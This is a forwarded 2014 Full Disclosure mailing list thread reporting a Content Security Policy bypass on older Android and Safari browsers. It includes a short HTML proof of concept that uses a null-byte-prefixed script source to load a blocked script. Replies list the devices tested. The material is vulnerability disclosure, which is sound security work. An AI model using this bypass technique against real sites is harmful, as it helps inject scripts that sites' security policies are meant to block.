---------- Mensagem encaminhada ---------- De: "Vitor Ventura" <[email protected]> Data: 14/10/2014 12:32 Assunto: Re: [FD] CSP Bypass on Android prior to 4.4 Para: "E Boogie" <[email protected]> Cc:
Hello, My testing was done on BQ aquaris 5 HD with android 4.2.1 using chrome. It wasn't vulnerable. Regards VV Em 14/10/2014 00:12, "E Boogie" <[email protected]> escreveu: > I've done a little more testing and what I've found is pretty startling. > > I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass > worked. > > I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and > the CSP bypass also worked. > > If you are so kind, please use ejj.io/test.php to test this for me. If it > worked, please press the "IT WORKED" button. > > This way I can compile a large finger print of browsers/phones/versions the > CSP bypass worked on (based on user-agent) > > Evan J. > > On Sat, Oct 11, 2014 at 4:09 PM, E Boogie <[email protected]> wrote: > > > I've found a Content Security Policy bypass similar and related to the > same origin policy bypass in CVE-2014-6041. > https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041 > > > > I've tested this on an Android 4.3 tablet running a bunch of different > browsers, including Inbrowser, Firefox, and the default Android browser on > an emulator for Android 4.3.1. > > > > HTML PoC: > > > > <input type=button value="test" onclick=" > > a=document.createElement('script'); > > a.id='AA'; > > a.src='\u0000https://js.stripe.com/v2/'; > > document.body.appendChild(a); > > > > setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ > alert(2);}}, 400); > > return false;"> > > > > > > The content security policy rule that should block this is > > script-src 'self' https://js.stripe.com/v3/ ; > > > > The PoC worked if you see a popup containing stripes e(){} object. I set > the Timeout kind of short, so you may have to press the button twice before > you see the popup. > > > > I have a PoC test page at ejj.io/test.php > > > > Cheers, > > Evan J > > > > -- > > Evan J Johnson > > > > > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
